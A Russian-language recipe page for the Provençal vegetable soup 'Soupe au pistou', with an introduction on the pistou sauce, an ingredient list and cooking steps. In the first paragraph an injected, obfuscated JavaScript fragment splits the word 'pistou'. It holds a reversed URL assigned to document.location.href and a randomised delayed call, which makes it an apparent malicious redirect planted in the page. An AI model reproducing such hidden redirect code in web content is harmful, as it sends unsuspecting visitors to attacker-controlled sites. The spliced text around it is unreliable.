Французская кухня для начинающих: суп «Писту»

Soupe au pistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou — овощной суп из Прованса, главное в котором — соус «Писту», очень похожий на итальянское песто. Но не вздумайте говорить об этом французам и сравнивать их суп с минестроне: жители Прованса никогда не добавят в свой соус кедровые орехи.

Многие французские хозяйки считают, что для этого супа можно использовать только свежие овощи — кабачки, зелёную стручковую фасоль, красную и белую фасоль (обязательно не сушёные), картофель — и никакого мяса. Но в горных районах Прованса в суп «Писту» обязательно добавляют свиную рульку или окорок для более насыщенного вкуса и большей калорийности. По поводу макарон или мелкой вермишели мнения также разнятся. Но главное правило для всех одно: соус писту готовят из зелени базилика, чеснока и оливкового масла, иногда добавляя сыр и никогда — кедровые орехи.

269 calories

Суп «Писту»

Овощной суп из французского Прованса, который получил своё название в честь одноимённого соуса, очень похожего на песто.

Изображение рецепта Суп «Писту»

Суп «Писту»

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

60 минут

PT1H

PT1H

КОЛИЧЕСТВО ПОРЦИЙ:

8 порций

КАЛОРИЙНОСТЬ:

269 ккал

Сложность

Время

60 минут

Кол-во порций

8 порций

Калорийность

269 ккал

Ингредиенты

Цукини

450 г

Фасоль (стручковая)

260 г

Горох (зелёный)

250 г

Фасоль (сухая)

200 г

Макароны (мелкие)

100 г

Лук

2 шт.

Морковь

2 шт.

Помидоры

1 шт.

Чеснок

7 зубчиков

Базилик (свежий)

1 пучок

Масло (оливковое)

100 мл

Лавровый лист

2 шт.

Сыр (пармезан)

по вкусу

Тимьян (свежий)

по вкусу

Процесс приготовления

  1. Предварительно замочите фасоль на ночь.
  2. Слейте утром воду, выложите фасоль в кастрюлю, добавьте лавровый лист и залейте примерно полутора литрами свежей воды, чтобы покрыть полностью бобы. Готовьте фасоль около часа, добавляя при необходимости воду. Когда фасоль будет готова, снимите её с огня и отставьте в сторону, не сливая воду.
  3. Нарежьте лук, морковь, цуккини и измельчите шесть зубчиков чеснока.
  4. В большой кастрюле нагрейте три столовые ложки оливкового масла и обжарьте на нём лук, чтобы он стал прозрачным. Добавьте морковь, цуккини, стручковую фасоль, чеснок, тимьян и соль по вкусу.
  5. Когда овощи будут готовы, добавьте вареёную фасоль вместе с водой, зелёный горошек и макароны. Залейте всё ещё двумя литрами воды, доведите суп до кипения и варите несколько минут до готовности макарон.
  6. Пока варится суп, приготовьте писту — прованский вариант песто. Для этого измельчите в блендере зубчик чеснока, базилик и щепотку соли. Постепенно вливайте 60 мл оливкового масла, затем добавьте нарезанный помидор и натёртый пармезан.
  7. Налейте суп в тарелку, добавьте щедрую ложку писту сверху и подавайте к столу.

Статьи по теме

Рецепт дня: прекрасный луковый суп

Рецепт дня: жёлтый крем-суп из гороха

Рецепт дня: картофельный суп с пореем

10 супов, которые приготовит даже ребёнок

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector